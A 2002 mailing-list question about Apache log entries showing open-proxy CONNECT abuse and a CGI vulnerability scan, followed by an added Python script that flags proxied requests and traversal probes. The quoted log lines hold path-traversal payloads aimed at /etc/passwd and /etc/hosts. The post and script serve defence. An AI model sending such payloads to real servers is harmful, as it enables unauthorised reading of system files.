[Tech] Redirections? Attacks on the system?

Roberto Del Bianco delbia@tin.it
Wed 15 May 2002 17:50:48 CEST


Hello everyone! I read (every now and then) but never post... today though
I will :-)

I wanted to put a question to you: in the Apache log of my personal site
(by the way, have you visited it?) I sometimes notice strange arrivals, as
if someone were trying to connect somewhere else through my server.

For example, things like this come in:

212.171.48.247  - - [04/Mar/2002:11:00:32 +0100] "CONNECT 207.46.133.140:21 HTTP/1.0" 200 14803
62.211.229.29  - - [06/Mar/2002:20:31:53 +0100] "CONNECT irc2.tin.it:6667 HTTP/1.0" 200 19191
195.130.233.45  - - [12/Mar/2002:21:24:27 +0100] "CONNECT 195.130.233.45:6667 HTTP/1.0" 200 18899

or also:

211.35.206.221  - - [14/May/2002:21:46:31 +0200] "HEAD http://member.asiasex.com/ HTTP/1.0" 200 0

as well as:

213.45.117.35  - - [26/Apr/2002:12:59:36 +0200] "HEAD ///carbo.ddl HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:36 +0200] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:37 +0200] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:38 +0200] "HEAD /cgi-bin/faxsurvey HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:39 +0200] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:39 +0200] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:40 +0200] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:41 +0200] "HEAD /cgi-bin/jj HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:42 +0200] "HEAD /technote/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:42 +0200] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:44 +0200] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:44 +0200] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:45 +0200] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:46 +0200] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:46 +0200] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:47 +0200] "HEAD /iisadmpwd/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:48 +0200] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:49 +0200] "HEAD /cgi-dos/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:50 +0200] "HEAD /scripts/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:50 +0200] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:52 +0200] "HEAD /mall_log_files/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:52 +0200] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:53 +0200] "HEAD /Admin_files/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:54 +0200] "GET ///quote.html HTTP/1.0" 404 281
213.45.117.35  - - [26/Apr/2002:12:59:54 +0200] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:12:59:55 +0200] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:56 +0200] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 292
213.45.117.35  - - [26/Apr/2002:12:59:56 +0200] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 289
213.45.117.35  - - [26/Apr/2002:12:59:57 +0200] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 292
213.45.117.35  - - [26/Apr/2002:12:59:58 +0200] "HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:58 +0200] "HEAD /foldoc/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:59 +0200] "HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:00 +0200] "GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 286
213.45.117.35  - - [26/Apr/2002:13:00:01 +0200] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:02 +0200] "HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html  HTTP/1.0" 404 0
200 25084
213.45.117.35  - - [26/Apr/2002:13:00:03 +0200] "GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 287
213.45.117.35  - - [26/Apr/2002:13:00:05 +0200] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 284
213.45.117.35  - - [26/Apr/2002:13:00:08 +0200] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:11 +0200] "HEAD /cgi-bin/newsdesk.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:12 +0200] "HEAD /cgi-bin/pals-cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:14 +0200] "HEAD /ROADS/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:15 +0200] "GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:13:00:15 +0200] "HEAD /way-board/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:16 +0200] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 289
213.45.117.35  - - [26/Apr/2002:13:00:17 +0200] "HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:17 +0200] "HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:18 +0200] "HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:19 +0200] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:13:00:22 +0200] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 286

which looks to me almost like an attack attempt (forgive my limited
experience with this kind of thing), although obviously, since these files
don't exist on the Linux site, the server answers with 404.

Above all, for anyone thinking of using my site as a "springboard" for some
purpose of their own, are there means (for example, in the Apache
configuration) to block such initiatives? From the system's point of view I
should be fairly well protected (I use "iridium", which is a substantial
script based on ipchains, and which I believe I have configured
correctly).


Awaiting news! :-)
-----------------------------------------------------------------------------------------

Roberto Del Bianco - ICQ 68931976, robi55 on IRC.
My Home Site: http://www.casamia.2y.net
Visit also: http://www.peacelink.it, the best Italian site for Pacifism
and Human Rights.
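As an added example (not code from the post or from the list), here is a small Python script that parses Apache common-log lines like the ones quoted above and separates the two things the log is showing: requests that asked the server to act as a proxy (a CONNECT, or an absolute http:// URL as the request target) and were answered 200, versus one client walking a list of well-known CGI paths and collecting 404s. The sample lines are copied from the post; the 10.0.0.5 line is a constructed ordinary request, and the 404 threshold is an assumed value.

```python
import re
from collections import defaultdict

# Apache common log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+)\s+\S+\s+\S+\s+\[(?P<time>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+(?P<proto>HTTP/[\d.]+))?"\s+'
    r'(?P<status>\d{3})\s+(?P<bytes>\d+|-)'
)

# "../" style traversal, its %2F-encoded form, and a NUL byte in the request target
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.%2[fF]|%00)')

# Sample log: lines copied from the post, plus one constructed normal request (10.0.0.5)
SAMPLE_LOG = """\
212.171.48.247  - - [04/Mar/2002:11:00:32 +0100] "CONNECT 207.46.133.140:21 HTTP/1.0" 200 14803
62.211.229.29  - - [06/Mar/2002:20:31:53 +0100] "CONNECT irc2.tin.it:6667 HTTP/1.0" 200 19191
211.35.206.221  - - [14/May/2002:21:46:31 +0200] "HEAD http://member.asiasex.com/ HTTP/1.0" 200 0
213.45.117.35  - - [26/Apr/2002:12:59:36 +0200] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:37 +0200] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:54 +0200] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:13:00:22 +0200] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 286
10.0.0.5  - - [26/Apr/2002:13:05:00 +0200] "GET /index.html HTTP/1.0" 200 1234
"""


def parse_line(line):
    """Return a dict for one common-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def is_proxy_request(rec):
    """CONNECT, or an absolute URI as target, asks the server to relay on the client's behalf."""
    return rec["method"] == "CONNECT" or "://" in rec["target"]


def is_probe(rec):
    """Request target carries a traversal or NUL pattern typical of CGI vulnerability scanners."""
    return bool(TRAVERSAL_RE.search(rec["target"]))


def analyse(log_text, scan_threshold=3):
    """Split a log into served proxy requests and per-host scanner statistics."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    # Proxy requests that were *served* (200) are the ones that matter: the server relayed them
    proxied = [r for r in records if is_proxy_request(r) and r["status"] == 200]
    not_found = defaultdict(int)
    probes = defaultdict(int)
    for r in records:
        if r["status"] == 404:
            not_found[r["host"]] += 1
        if is_probe(r):
            probes[r["host"]] += 1
    # A host is a scanner if it piles up 404s or sends any traversal-style probe
    scanners = sorted(h for h in set(not_found) | set(probes)
                      if not_found.get(h, 0) >= scan_threshold or probes.get(h, 0) > 0)
    return {"proxied": proxied, "scanners": scanners,
            "not_found": dict(not_found), "probes": dict(probes)}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for r in result["proxied"]:
        print(f"PROXIED  {r['host']} {r['method']} {r['target']} -> {r['status']} ({r['bytes']} bytes)")
    for h in result["scanners"]:
        print(f"SCANNER  {h}: {result['not_found'].get(h, 0)} x 404, "
              f"{result['probes'].get(h, 0)} traversal probes")
```

A CONNECT or absolute-URL request answered with 200 is the one to act on: it means the server relayed the request instead of refusing it, which is exactly the "springboard" the post asks about. In Apache that behaviour comes from mod_proxy being loaded with `ProxyRequests On`; leaving the directive at its default `ProxyRequests Off` (or not loading mod_proxy at all) makes the server reject such requests, and the same log check confirms the change took effect. The 404 series from 213.45.117.35 is a CGI vulnerability scan; as the post says, without those scripts installed it only produces noise, but it is worth running the check regularly to confirm that none of the probed paths ever starts returning 200.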





More information about the flug-tech list